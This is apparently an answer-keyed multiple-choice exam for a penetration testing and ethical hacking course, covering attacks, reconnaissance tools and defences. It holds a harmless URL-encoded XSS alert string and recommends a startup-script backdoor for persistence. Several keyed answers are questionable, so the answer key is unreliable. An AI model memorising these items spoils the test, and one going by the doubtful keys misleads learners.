HOD402

Final_Lam_Khac_De_Lam_Tot

An attacker successfully performs a DNS poisoning attack on a organization’s network. What is the most likely impact?

a. The attacker can access all encrypted data

b. The attacker gains administrator privileges

c. The firewall is bypassed

d. The company’s email system is disabled

e. Users are redirected to malicious websites

e. Users are redirected to malicious websites

What is the main risk of phishing attacks?

a. Exploiting unpatched software vulnerabilities

b. Altering DNS records

c. Tricking users into revealing sensitive information

d. Disrupting network traffic

e. Manipulating firewall configurations

c. Tricking users into revealing sensitive information

You are investigation a data breach at a company. You find that an attacker used stolen employee login credentials to access confidential records. What is the best long-term mitigation?

a. Disable remote access for all employees
b. Implement mandatory password changes every week
c. Enforce multi-factor authentication for logins
d. Block access to the confidential records permanently
e. Monitor all network traffic in real-time

c. Enforce multi-factor authentication for logins

What type of attack is an attacker performing when manipulating DNS cache records?

a. ARP poisoning

b. Phishing

c. DNS spoofing

d. SQL injection

e. Cross-site scripting (XSS)

c. DNS spoofing

What is the primary risk of improper input validation?

a. Increased CPU usage

b. Loss of user data

c. Remote code execution

d. System crashes

e. Slower network speeds

c. Remote code execution

What is the difference between horizontal and vertical privilege escalation?

a. Horizontal is related to firewall bypass, vertical is about database attacks

b. Horizontal focuses on brute force attacks, vertical focuses on SQL injection

c. Horizontal is used for lateral movement between networks, vertical is within the same machine

d. Horizontal is only possible on Windows, vertical is only on Linux

e. Horizontal involves switching accounts at the same privilege level, vertical gains higher privileges

e. Horizontal involves switching accounts at the same privilege level, vertical gains higher privileges

A penetration tester identifies that a target system is running an outdated version of OpenSSH. What is the most effective way to confirm whether this presents a security risk?

a. Use a web vulnerability scanner
b. Run an SQL injection test
c. Check exploit databases for known vulnerabilities
d. Attempt to brute-force SSH credentials
e. Modify SSH configurations

c. Check exploit databases for known vulnerabilities

What is a rogue access point?

a. A form of DNS poisoning
b. An unauthorized access point posing as a trusted one
c. A legitimate wireless network for guests
d. A secure VPN tunnel
e. A security patch for Wi-Fi networks

b. An unauthorized access point posing as a trusted one

An attacker successfully executes a phishing attack on an employee, obtaining their VPN credentials. What should the company implement to prevent similar attacks?

a. Implement multi-factor authentication (MFA)
b. Use network segmentation
c. Increase firewall logging
d. Disable email attachments
e. Require stronger passwords

a. Implement multi-factor authentication (MFA)

Which tool is commonly used for DNS reconnaissance?

a. Metasploit
b. Nikto
c. Wireshark
d. Nslookup
e. Aircrack-ng

d. Nslookup

You are hired to perform a penetration test on a company’s internal network. You notice that a critical database is running on an unpatched version of MySQL. What should you do first?

a. Change the admin credentials to secure the system
b. Report the issue without further testing
c. Verify the exploitability by conducting a safe proof-of-concept attack
d. Immediately exploit the known vulnerabilities
e. Modify the database schema to test access control

c. Verify the exploitability by conducting a safe proof-of-concept attack

A company’s employees report receiving phishing emails that appear to come from their CEO, requesting wire transfers. What security measure can best prevent this attack?

a. Require employees to change passwords frequently
b. Implement SPF, DKIM, and DMARC on email servers
c. Use antivirus software on employee computers
d. Ban external email communication
e. Restrict all outgoing wire transfers

b. Implement SPF, DKIM, and DMARC on email servers

What type of attack involves intercepting and altering communications between two parties?

a. Ransomware
b. SQL injection
c. Denial-of-service (DoS)
d. Phishing
e. Man-in-the-middle attack

e. Man-in-the-middle attack

A penetration tester successfully executes a command injection attack on a web server. What is the most likely reason this vulnerability exists?

a. The web application has excessive permissions
b. User input is not properly validated and sanitized
c. The website does not use HTTPS
d. The server is not running the latest security patches
e. The firewall is misconfigured

b. User input is not properly validated and sanitized

A hacker successfully exploits a website vulnerability and forces an authenticated user to execute unwanted actions on another site. What type of attack is this?

a. Cross-Site Request Forgery (CSRF)
b. Clickjacking
c. Man-in-the-Middle (MitM)
d. SQL Injection
e. Cross-Site Scripting (XSS)

a. Cross-Site Request Forgery (CSRF)

A penetration tester discovers that a web application allows users to enter JavaScript code in form fields. What is the likely vulnerability?

a. Cross-Site Scripting (XSS)
b. Buffer Overflow
c. Cross-Site Request Forgery (CSRF)
d. Privilege Escalation
e. SQL Injection

a. Cross-Site Scripting (XSS)

Which type of attack exploits vulnerabilities in the Windows SMB protocol, as seen in WannaCry?

a. Brute-force attack
b. Cross-Site Scripting (XSS)
c. EternalBlue
d. Session Hijacking
e. SQL Injection

c. EternalBlue

Which scenario best illustrates the concept of social engineering?

a. Running an SQL injection attack on a login form
b. Tricking an employee into revealing their login credentials
c. Exploiting a misconfigured firewall
d. Performing a brute-force attack on an SSH server
e. Using a vulnerability scanner to find open ports

b. Tricking an employee into revealing their login credentials

You are performing a security assessment and discover that an application uses hardcoded administrator credentials in its source code. What is the best way to mitigate this issue?

a. Store credentials securely using environment variables
b. Change the administrator username periodically
c. Require multi-factor authentication
d. Encrypt the credentials in the source code
e. Move the credentials to a comment section in the code

a. Store credentials securely using environment variables

A company suspects an internal employee is exfiltrating data over encrypted HTTPS connections. Which tool would best help in investigating this issue?

a. Burp Suite
b. Wireshark
c. Metasploit
d. Nmap
e. John the Ripper

a. Burp Suite

Which of the following best describes fingerprinting?

a. Exploiting software vulnerabilities
b. Identifying specific details about a target system
c. Intercepting network traffic
d. Conducting phishing attacks
e. Capturing biometric authentication data

b. Identifying specific details about a target system

During a security audit, you discover that a company’s web application does not properly implement session expiration. What is a potential risk?

a. Users may experience performance issues
b. The application will be vulnerable to DoS attacks
c. Users will have to log in frequently
d. Attackers can hijack abandoned sessions
e. The database may become overloaded

d. Attackers can hijack abandoned sessions

You are performing a penetration test and discover an open FTP server with anonymous login enabled. What should be your next step?

a. Report the vulnerability without further analysis
b. Check for writable directories and potential sensitive file access
c. Run a brute-force attack on the FTP credentials
d. Immediately exploit the vulnerability without documentation
e. Ignore it since anonymous FTP is a common setup

b. Check for writable directories and potential sensitive file access

Why is it necessary to follow a methodology in penetration testing?

a. To bypass security controls faster
b. To speed up the hacking process
c. To find vulnerabilities quickly without documentation
d. To avoid using automated tools
e. To ensure repeatable and consistent results

e. To ensure repeatable and consistent results

An ethical hacker is testing a web application and identifies an input field vulnerable to SQL injection. What is the best way to confirm the vulnerability?

a. Check the application’s source code for SQL vulnerabilities
b. Directly exploit the database without permission
c. Brute-force the application’s login page
d. Use automated tools like SQLmap to test for injection
e. Modify the input field manually with SQL queries and analyze responses

e. Modify the input field manually with SQL queries and analyze responses

During a penetration test, you gain access to a low-privilege user account on a Linux server. What is the best next step to escalate privileges?

a. Directly modify the system kernel
b. Modify the SSH configuration file
c. Attempt to brute-force the root password
d. Run sudo -l to check if the user has root access
e. Uninstall the firewall

d. Run sudo -l to check if the user has root access

What is the primary goal of penetration testing?

a. Improve network performance
b. Disable security controls temporarily
c. Bypass security measures undetected
d. Encrypt sensitive user data
e. Identify security vulnerabilities before attackers do

e. Identify security vulnerabilities before attackers do

An attacker uses Bluetooth to send unsolicited messages to nearby devices. What is this attack called?

a. Bluesnarfing
b. Bluetooth Injection
c. Bluejacking
d. Bluebugging
e. RFID Spoofing

c. Bluejacking

An attacker exploits a web application’s session management vulnerability to take control of a logged-in user’s session. What is this attack called?

a. Cross-Site Request Forgery (CSRF)
b. SQL Injection
c. Session Hijacking
d. Denial-of-Service (DoS)
e. Man-in-the-Middle Attack

c. Session Hijacking

An attacker successfully injects malicious SQL statements into a web application, extracting user credentials from the database. What could have prevented this attack?

a. Changing the database structure
b. Encrypting the database
c. Using input validation and parameterized queries
d. Blocking SQL queries from the web server
e. Implementing a stronger password policy

c. Using input validation and parameterized queries

Which of the following is an example of active reconnaissance?

a. Monitoring open-source intelligence (OSINT) feeds
b. Running an Nmap scan on a target network
c. Using a WHOIS lookup to find domain details
d. Conducting a social engineering attack
e. Searching Google for publicly available information

b. Running an Nmap scan on a target network

A company wants to prevent employees from accessing malicious websites. What security measure should they implement?

a. Disable all browser plugins
b. Block all external network traffic
c. Use only encrypted HTTP connections
d. Use a Web Application Firewall (WAF)
e. Implement a DNS filtering solution

e. Implement a DNS filtering solution

You are tasked with securing a Linux server against brute-force SSH attacks. Which security measure would be most effective?

a. Disable all password-based authentication
b. Change the SSH port to a non-standard number
c. Require users to change passwords every week
d. Enable multi-factor authentication (MFA)
e. Use a firewall to block all SSH connections

d. Enable multi-factor authentication (MFA)

A company experiences a ransomware attack, and attackers demand Bitcoin for decryption. What is the best immediate response?

a. Disconnect infected systems from the network
b. Pay the ransom to restore systems quickly
c. Delete all encrypted files
d. Attempt to modify the ransomware’s code
e. Try brute-forcing the encryption key

a. Disconnect infected systems from the network

You are testing a web application that allows users to upload profile pictures. What is the most significant security risk if the upload function is not properly secured?

a. The images could be stored in the wrong folder
b. Users may see distorted images on the page
c. Users could upload malware disguised as images
d. The uploaded images might load slowly
e. The website could crash due to large file sizes

c. Users could upload malware disguised as images

An attacker sets up a fraudulent website that mimics a bank’s login page and tricks users into entering their credentials. What type of attack is this?

a. Phishing
b. Watering Hole Attack
c. Spear Phishing
d. Credential Stuffing
e. Whaling

a. Phishing

A user receives a pop-up warning that their system has been infected with a virus and is prompted to download an "antivirus tool." What kind of attack is this?

a. Ransomware
b. Scareware
c. Spyware
d. Malvertising
e. Phishing

b. Scareware

Which attack is best prevented by implementing user input validation and output encoding in a web application?

a. Denial of Service (DoS)
b. SQL Injection
c. Session hijacking
d. Cross-Site Scripting (XSS)
e. Brute-force attack

d. Cross-Site Scripting (XSS)

Which of the following scenarios is an example of privilege escalation?

a. An attacker uses social engineering to convince an employee to share their password
b. An attacker performs a brute-force attack on a web login page
c. An attacker with a standard user account exploits a vulnerability to gain administrator access
d. An attacker sends a phishing email to gain access to a system
e. An attacker intercepts a user’s login credentials

c. An attacker with a standard user account exploits a vulnerability to gain administrator access

What is the primary purpose of OSINT in penetration testing?

a. Gathering publicly available information
b. Cracking password hashes
c. Breaking into encrypted networks
d. Exploiting remote vulnerabilities
e. Testing SQL injection vulnerabilities

a. Gathering publicly available information

What is passive reconnaissance?

a. Sending phishing emails to users
b. Exploiting vulnerabilities in a network
c. Running vulnerability scans on a target network
d. Gathering information without interacting with the target
e. Actively probing a target for vulnerabilities

d. Gathering information without interacting with the target

What is the primary purpose of a Rules of Engagement (RoE) document?

a. Listing all vulnerabilities in a system
b. Ensuring testers work in isolation
c. Describing hacking techniques for the test
d. Defining legal scope and testing limitations
e. Outlining cybersecurity job roles

d. Defining legal scope and testing limitations

An attacker successfully exfiltrates customer data from a company’s database. What is the best immediate response?

a. Notify customers immediately
b. Shut down the entire network
c. Format the database and restore from backup
d. Identify and close the exploited vulnerability
e. File a lawsuit against the attacker

d. Identify and close the exploited vulnerability

A penetration tester finds that an organization’s internal network allows unrestricted outbound traffic. What is a potential security risk of this configuration?

a. Increased attack surface for brute-force attacks
b. Increased vulnerability to phishing attacks
c. Risk of an internal Denial of Service (DoS) attack
d. Higher likelihood of SQL injection vulnerabilities
e. Potential for data exfiltration via command and control channels

e. Potential for data exfiltration via command and control channels

Which of the following techniques is most effective for preventing brute-force attacks on user accounts?

a. Implementing account lockout policies
b. Changing passwords every week
c. Logging all unsuccessful login attempts
d. Using short, complex passwords
e. Disabling failed login attempts

a. Implementing account lockout policies

What is the primary difference between black-hat and white-hat hackers?

a. The types of organizations they target
b. Their level of expertise
c. The tools they use
d. The programming languages they use
e. Their intent and legal permissions

e. Their intent and legal permissions

Which of the following best defines an ethical hacker?

a. A security professional who tests systems with authorization
b. A hacker who breaks into systems without malicious intent
c. A hacker who finds vulnerabilities and sells exploits
d. A hacker who uses malware for research
e. A hacker who targets organizations for personal gain

a. A security professional who tests systems with authorization

Which of the following tools is commonly used for network scanning?

a. Burp Suite
b. Ettercap
c. John the Ripper
d. Nmap
e. Aircrack-ng

d. Nmap

An attacker successfully executes an on-path (Man-in-the-Middle) attack on a victim’s HTTPS connection. What is the likely reason this attack was successful?

a. The attacker brute-forced the TLS encryption key
b. The attacker disabled HTTPS on the server
c. The victim accepted a fraudulent security certificate
d. The attacker exploited an expired SSL certificate
e. The victim’s device does not support TLS

c. The victim accepted a fraudulent security certificate

What is the primary goal of privilege escalation?

a. Exploiting phishing attacks
b. Deploying ransomware
c. Intercepting network traffic
d. Identifying system vulnerabilities
e. Gaining unauthorized administrative access

e. Gaining unauthorized administrative access

What is an evil twin attack?

a. Setting up multiple firewalls to protect data
b. Using two-factor authentication for Wi-Fi security
c. Encrypting data before transmission
d. Creating a duplicate access point to intercept traffic
e. Disabling network access control

d. Creating a duplicate access point to intercept traffic

An attacker successfully performs an ARP spoofing attack. What is the likely impact?

a. They can perform a brute-force attack
b. They can execute commands on a remote system
c. They can disable all security measures
d. They can gain administrator access to a server
e. They can intercept and modify network traffic

e. They can intercept and modify network traffic

You are assessing a web application for vulnerabilities. A login page is vulnerable to SQL injection, but you only get generic error messages. What technique can help extract database information?

a. Attempt buffer overflow
b. Use a man-in-the-middle attack
c. Use brute-force attacks
d. Modify the server’s firewall rules
e. Use time-based blind SQL injection

e. Use time-based blind SQL injection

What is the main weakness of WEP encryption?

a. It is only used in enterprise networks
b. Incompatibility with newer devices
c. Strong encryption making it hard to use
d. Short key lengths and weak encryption algorithms
e. It requires a dedicated firewall

d. Short key lengths and weak encryption algorithms

An organization suspects that an attacker is using their Wi-Fi network to steal sensitive data. What is the best way to detect and stop this activity?

a. Use static IP addressing
b. Enable MAC address filtering
c. Monitor network traffic and analyze for anomalies
d. Disable the SSID broadcast
e. Increase the Wi-Fi signal range

c. Monitor network traffic and analyze for anomalies

What is the main goal of social engineering attacks?

a. Modify software code remotely
b. Exploit system vulnerabilities
c. Bypass firewalls and network defenses
d. Gain unauthorized access through human manipulation
e. Deploy ransomware attacks

d. Gain unauthorized access through human manipulation

What is a common method used for detecting live hosts on a network?

a. Privilege escalation
b. Data exfiltration
c. Firewall evasion
d. ARP scanning
e. DNS enumeration

d. ARP scanning

An attacker uses JavaScript to steal a user’s session cookie and gain unauthorized access. Which security measure can mitigate this attack?

a. Using the HttpOnly flag for cookies
b. Limiting login attempts
c. Encrypting the session token
d. Disabling JavaScript in the browser
e. Using stronger password policies

a. Using the HttpOnly flag for cookies

During a penetration test, you discover that a web server is using an outdated version of Apache with a known remote code execution vulnerability. What should you do next?

a. Reinstall the Apache server
b. Verify the exploitability by attempting a safe proof-of-concept
c. Exploit the vulnerability to gain access
d. Report the issue immediately without testing
e. Modify firewall rules to block access

b. Verify the exploitability by attempting a safe proof-of-concept

What technique is commonly used in reconnaissance to gather domain information?

a. Password cracking
b. Firewall evasion
c. SQL injection
d. Whois lookup
e. Session hijacking

d. Whois lookup

An attacker uses a rogue access point to capture login credentials from unsuspecting users. What security measure can best protect against this attack?

a. Increase Wi-Fi signal strength
b. Use VPN encryption for all network traffic
c. Use static IP addresses
d. Use only wired connections
e. Disable DHCP on all devices

b. Use VPN encryption for all network traffic

You are conducting a penetration test and gain access to a company’s internal database. Which action aligns with ethical hacking best practices?

a. Report the vulnerability to the client and avoid further data access
b. Extract all user data to demonstrate the risk
c. Use the access to escalate privileges
d. Modify database records to test access control
e. Delete sensitive data to prevent further attacks

a. Report the vulnerability to the client and avoid further data access

What is a zero-day vulnerability?

a. A vulnerability that only affects Linux systems
b. A vulnerability that has no known exploit
c. A vulnerability that can only be exploited once
d. A vulnerability with an immediate patch available
e. A vulnerability that is not exploitable

b. A vulnerability that has no known exploit

Which protocol is commonly used for remote access to a system?

a. SNMP
b. SSH
c. HTTP
d. ICMP
e. DNS

b. SSH

Which of the following is NOT a key principle of ethical hacking?

a. Responsible disclosure
b. Legality
c. Exploiting without reporting
d. Documentation
e. Permission

c. Exploiting without reporting

An attacker successfully spoofs an organization’s email domain and sends phishing emails to employees. What should the company implement to prevent this attack?

a. Enable DNS filtering
b. Require employees to change passwords frequently
c. Disable email forwarding
d. Implement SPF, DKIM, and DMARC
e. Increase antivirus scans

d. Implement SPF, DKIM, and DMARC

Which statement best describes the term ethical hacker?
a. a person who uses different tools than nonethical hackers to find vulnerabilities and exploit targets
b. a person that is financially motivated to find vulnerabilities and exploit targets
c. a person that is looking to make a point or to promote what they believe
d. a person who mimics an attacker to evaluate the security posture of a network

d. a person who mimics an attacker to evaluate the security posture of a network

Which threat actor term describes a well-funded and motivated group that will use the latest attack techniques for financial gain?
a. hacktivist
b. state-sponsored attacker
c. organized crime
d. insider threat

c. organized crime

3. Which type of threat actor uses cybercrime to steal sensitive data and reveal it publicly to embarrass a target?
a. organized crime
b. hacktivist
c. insider threat
d. state-sponsored attacker

b. hacktivist

4. What is a state-sponsored attack?
a. An attack perpetrated by a well-funded and motivated group that will typically use the latest attack techniques for financial gain.
b. An attack perpetrated by governments worldwide to disrupt or steal information from other nations.
c. An attack perpetrated by disgruntled employees inside an organization.
d. An attack is perpetrated to steal sensitive data and then reveal it to the public to embarrass or financially affect a target.

b. An attack perpetrated by governments worldwide to disrupt or steal information from other nations.

5. What is an insider threat attack?
a. An attack perpetrated by a well-funded and motivated group that will typically use the latest attack techniques for financial gain.
b. An attack perpetrated by governments worldwide to disrupt or steal information from other nations.
c. An attack perpetrated by disgruntled employees inside an organization.
d. An attack is perpetrated to steal sensitive data and then reveal it to the public to embarrass or financially affect a target.

c. An attack perpetrated by disgruntled employees inside an organization.

What kind of security weakness is evaluated by application-based penetration tests?
a. firewall security
b. logic flaws
c. wireless deployment
d. data integrity between a client and a cloud provider

b. logic flaws

What two resources are evaluated by a network infrastructure penetration test? (Choose two.)
a. AAA servers
b. CSPs
c. web servers
d. IPSs
e. back-end databases

a. AAA servers

d. IPSs

8. When conducting an application-based penetration test on a web application, the assessment should also include testing access to which resources?
a. AAA servers
b. cloud services
c. switches, routers, and firewalls
d. back-end databases

d. back-end databases

9. What is the purpose of bug bounty programs used by companies?
a. reward security professionals for discovering malicious activities by attackers in the systems of the company
b. reward security professionals for fixing vulnerabilities in the systems of the company
c. reward security professionals for breaking into a corporate facility to expose weaknesses in the physical perimeter
d. reward security professionals for finding vulnerabilities in the systems of the company

d. reward security professionals for finding vulnerabilities in the systems of the company

10. What characterizes a partially known environment penetration test?
a. The tester must test the electrical grid supporting the infrastructure of the target.
b. The tester is provided with a list of domain names and IP addresses in the scope of a particular target.
c. The test is a hybrid approach between unknown and known environment tests.
d. The tester should not have prior knowledge of the organization and infrastructure of the target.

c. The test is a hybrid approach between unknown and known environment tests.

11. What characterizes a known environment penetration test?
a. The test is somewhat of a hybrid approach between unknown and known environment tests.
b. The tester could be provided with network diagrams, IP addresses, configurations, and user credentials.
c. The tester should not have prior knowledge of the organization and infrastructure of the target.
d. The tester may be provided only the domain names and IP addresses in the scope of a particular target.

b. The tester could be provided with network diagrams, IP addresses, configurations, and user credentials.

12. Which type of penetration test would only provide the tester with limited information such as the domain names and IP addresses in the scope?
a. known-environment test
b. partially known environment test
c. unknown-environment test
d. OWASP Web Security Testing Guide

c. unknown-environment test

14. Which three options are phases in the Penetration Testing Execution Standard (PTES)? (Choose three.)
a. Threat modeling
b. Penetration
c. Reporting
d. Enumerating further
e. Network mapping
f. Exploitation

a. Threat modeling

c. Reporting

f. Exploitation

15. Which two options are phases in the Information Systems Security Assessment Framework (ISSAF)? (Choose two.)
a. Pre-engagement interactions
b. Maintaining access
c. Reporting
d. Post-exploitation
e. Vulnerability identification

b. Maintaining access

e. Vulnerability identification

16. Which two options are phases in the Open Source Security Testing Methodology Manual (OSSTMM)? (Choose two.)
a. Vulnerability Analysis
b. Maintaining Access
c. Work Flow
d. Network Mapping
e. Trust Analysis

c. Work Flow

e. Trust Analysis

17. Which penetration testing methodology is a comprehensive guide focused on web application testing?
a. MITRE ATT&CK
b. OWASP WSTG
c. NIST SP 800-115
d. OSSTMM

b. OWASP WSTG

18. Which option is a Linux distribution that includes penetration testing tools and resources?
a. OWASP
b. PTES
c. SET
d. BlackArch

d. BlackArch

19. Which option is a Linux distribution URL that provides a convenient learning environment about pen testing tools and methodologies?
a. vmware.com
b. attack.mitre.org
c. parrotsec.org
d. virtualbox.org

c. parrotsec.org

20. What does the “Health Monitoring” requirement mean when setting up a penetration test lab environment?
a. The tester needs to be sure that a lack of resources is not the cause of false results.
b. The tester needs to be able to determine the causes when something crashes.
c. The tester needs to ensure controlled access to and from the lab environment and restricted access to the internet.
d. The tester validates a finding running the same test with a different tool to see if the results are the same.

b. The tester needs to be able to determine the causes when something crashes.

21. Which tool would be useful when performing a network infrastructure penetration test?
a. vulnerability scanning tool
b. bypassing firewalls and IPSs tool
c. interception proxies tool
d. mobile application testing tool

b. bypassing firewalls and IPSs tool

22. Which tool should be used to perform an application-based penetration test?
a. sniffing traffic tool
b. bypassing firewalls and IPSs tool
c. interception proxies tool
d. cracking wireless encryption tool

c. interception proxies tool

23. Which tools should be used to perform a wireless infrastructure penetration test?
a. web vulnerability detection tools
b. traffic manipulation tools
c. proxy interception tools
d. de-authorizing network devices tools

d. de-authorizing network devices tools

24. Which tools should be used for testing the server and client platforms in an environment?
a. cracking wireless encryption tools
b. vulnerability scanning tools
c. interception proxies tools
d. de-authorizing network devices tools

b. vulnerability scanning tools

25. Sometimes a tester cannot virtualize a system to do the proper penetration testing. What action should be taken if a system cannot be tested in a virtualized environment?
a. a full backup of the system
b. rebuild the system after any test is performed
c. adopt penetration test tools that will certainly not damage the system
d. a complete report with recommended repairs

a. a full backup of the system

A penetration tester gains access to a system and wants to maintain persistence. Which method is the most stealthy approach?
a. Creating a new admin account with a common name
b. Deploying a ransomware attack
c. Modifying firewall rules to allow incoming connections
d. Installing a backdoor in the startup scripts
e. Replacing a critical system binary with a malicious version

d. Installing a backdoor in the startup scripts

A hacker successfully exploits a SQL injection vulnerability on a login page. What is the most likely outcome?
a. The hacker crashes the web application
b. The hacker gains remote access to the operating system
c. The hacker sends phishing emails to employees
d. The hacker gains administrator access to the database
e. The hacker disables the firewall

d. The hacker gains administrator access to the database

Which of the following is NOT a common type of social engineering attack?
a. Shoulder surfing
b. Phishing
c. SQL injection
d. Pretexting
e. Baiting

c. SQL injection

Which tool is commonly used for web vulnerability scanning?
a. Nikto
b. Aircrack-ng
c. Wireshark
d. Metasploit
e. Nmap

a. Nikto

What has been done to the following string? %3Cscript%3Ealert('wubble');%3C/script%3E

A. Base64 encoding

B. URL encoding

C. Encryption

D. Cryptographic hashing

B. URL encoding

What would you get from running the command dig ns domain.com?

A. Mail exchanger records for domain.com

B. Name server records for domain.com

C. Caching name server for domain.com

D. IP address for the hostname ns

B. Name server records for domain.com

What technique would you ideally use to get all of the hostnames associated with a domain?

A. DNS query

B. Zone copy

C. Zone transfer

D. Recursive request

C. Zone transfer

If you were to notice operating system commands inside a DNS request while looking at a packet capture, what might you be looking at?

A. Tunneling attack

B. DNS amplification

C. DNS recursion

D. XML entity injection

A. Tunneling attack

What would be the purpose of running a ping sweep?

A. You want to identify responsive hosts without a port scan.

B. You want to use something that is light on network traffic.

C. You want to use a protocol that may be allowed through the firewall.

D. All of the above.

D. All of the above.

How many functions are specified by NIST’s cybersecurity framework?

A. 0

B. 3

C. 5

D. 4

C. 5